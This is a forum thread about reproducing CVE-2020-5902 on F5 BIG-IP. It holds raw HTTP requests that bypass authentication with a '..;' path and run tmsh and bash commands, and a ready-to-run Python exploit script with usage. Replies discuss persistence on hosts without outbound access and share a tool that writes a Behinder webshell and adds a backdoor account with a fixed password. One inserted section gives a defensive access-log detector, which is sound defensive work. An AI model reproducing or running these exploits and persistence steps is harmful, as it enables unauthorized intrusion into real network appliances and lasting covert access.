CVE-2020-5902 BIG-IP RCE vulnerability reproduction

```http
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list
```

```http
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 50

command=create+cli+alias+private+list+command+bash
```

```http
POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 33

content=id&fileName=%2Ftmp%2Fqqweqwe
```

```http
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 26

command=list+%2Ftmp%2Fqqweqwe
```

```http
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list
```

To avoid all that hassle, I put together a Python script:

```python
import requests,sys
def exp(url,cmd):
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080',
    }
    burp0_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp0_cookies = {"JSESSIONID": "41C2740D9D716832E72D7F00BDE3CFA3"}
    burp0_headers = {"Connection": "close", "Cache-Control": "max-age=0", "DNT": "1", "Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1",
                     "Sec-Fetch-Dest": "document", "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
                     "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"command": "create cli alias private list command bash"}
    burp_data = {"command": "delete cli alias private list"}
    burpq_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
    burpq_data = {"fileName": "/tmp/qwerty", "content": cmd}
    try:
        c = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                          verify=False)
        b = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxies,
                          verify=False)
        requests.post(burpq_url, headers=burp0_headers, cookies=burp0_cookies, data=burpq_data, proxies=proxies,
                      verify=False)
        print(url)
        print(b.content)
    except:
        return
    burp1_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp1_data = {"command": "list /tmp/qwerty"}
    try:
        a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp1_data, proxies=proxies,
                          verify=False)
        requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                      verify=False)
        print(a.content)
    except:
        return

if __name__ == "__main__":
    try:
        args=sys.argv[1]
        cmd=sys.argv[2]
        if args[-1]=='/':args=args[0:-1]
        exp(url=args,cmd=cmd)
    except:
        print('python f5_rce.py https://127.0.0.1 whoami')
```

Usage:

```
python f5_rce.py http://127.0.0.1 whoami
```

Thanks to TimWhite for the guidance.

Reference 1: https://github.com/jas502n/CVE-2020-5902/
Reference 2: https://github.com/rapid7/metasploit-framework/pull/13807/commits

4 Likes
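Every request in the post above starts with the unauthenticated login page followed by a `..;` segment. The following Python is an added example, written for this thread and not part of the original post or of the linked tools: it scans access-log lines for that pattern by checking whether the raw target sits under `/tmui/login.jsp` while the target, once `;` path parameters are stripped from each segment and `..` is resolved, does not. Modelling the backend as "strip path parameters, then resolve dot segments" is an assumption made for the example, and the log lines are constructed.

```python
"""Added example, not from the original post: flag CVE-2020-5902-style
requests in an access log.

A front-end that checks the raw prefix sees '..;' as an ordinary directory
name, while a servlet container that strips ';...' path parameters from each
segment before resolving '..' sees something else entirely.  The detector
below looks for exactly that disagreement.  The backend behaviour modelled
here is an assumption for this example; the log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not real traffic).  Lines 2 and 3
# reuse the request paths from the post; the others are benign look-alikes.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1234
10.0.0.7 - - [05/Jul/2020:10:01:03 +0000] "POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 512
10.0.0.7 - - [05/Jul/2020:10:01:04 +0000] "POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 80
10.0.0.9 - - [05/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp;jsessionid=ABC123 HTTP/1.1" 200 1234
10.0.0.3 - - [05/Jul/2020:10:01:06 +0000] "GET /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The only path an unauthenticated client is supposed to reach.
AUTH_EXEMPT_PREFIX = "/tmui/login.jsp"


def servlet_normalize(target):
    """Resolve a request target the way the backend is assumed to: percent-decode,
    drop ';param' path parameters from every segment, then collapse '.' and '..'."""
    path = unquote(target.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # '..;' becomes '..', 'x;jsessionid=..' becomes 'x'
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_auth_bypass(target):
    """True when the raw target sits under the login page but the normalized
    target does not, i.e. front-end and backend would disagree about it."""
    raw = unquote(target.split("?", 1)[0])
    if not raw.startswith(AUTH_EXEMPT_PREFIX):
        return False
    return not servlet_normalize(target).startswith(AUTH_EXEMPT_PREFIX)


def scan_log(text):
    """Return (ip, method, normalized_path, status) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_auth_bypass(m.group("target")):
            findings.append((m.group("ip"), m.group("method"),
                             servlet_normalize(m.group("target")),
                             int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for ip, method, path, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} -> {path} ({status})")
```

The `jsessionid` line is there on purpose: a legitimate `;` path parameter on the login page normalizes back to `/tmui/login.jsp` and is not flagged, so the check keys on the prefix escape rather than on the mere presence of a semicolon. A status of 200 on a flagged line is the signal worth escalating; a 401 or 404 means the access-control layer still held.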

Bro, have you tested this in a real-world environment? It seems that in real environments executing system commands doesn't work. Did you build the environment yourself, or are there some preconditions for command execution?

Everything above comes from real-world data...

From what I've found, it seems commands can only be executed when the user is root; otherwise it doesn't work. What's the reason for that? Have you run into this, boss?

Let me post a screenshot.

..Command execution only rarely works. It might be a problem with the exp.
Source code:
Link: https://pan.baidu.com/s/1IL8wjiSueDhVtoJj5HBLaQ
Extraction code: jm53

Link: https://pan.baidu.com/s/1t9LxC9cxDAaVW9LK77li6g
Extraction code: upjd

1 Like

Rather than executing commands, what I'd like to know is whether there is a good way to maintain access. Most of these machines have no outbound connectivity, so reverse shells and the like are not an option. The web path is read-only by default; after remounting it I wrote a webshell but got a 500. Does anyone have a good solution?

Your problem is caused by the Tomcat environment missing a jar. You need to upload a jar for it to work; the jar is named ecj-4.4.jar. Screenshot of the result:
In practice it's probably hard to upload a jar.

Thanks for the guidance. Based on the OP's code I wrote a script that automatically uploads the jar, writes the webshell and adds a shell account.
auto.zip (2.2 MB)
After it runs successfully it writes a default Behinder (冰蝎) shell to /tmui/tmui/login/images/test.jsp; afterwards you can use su abcd with the password password@123 to escalate privileges.
[screenshot: photo_2020-07-09_18-02-49]
It's just that the success rate is really rather low.

1 Like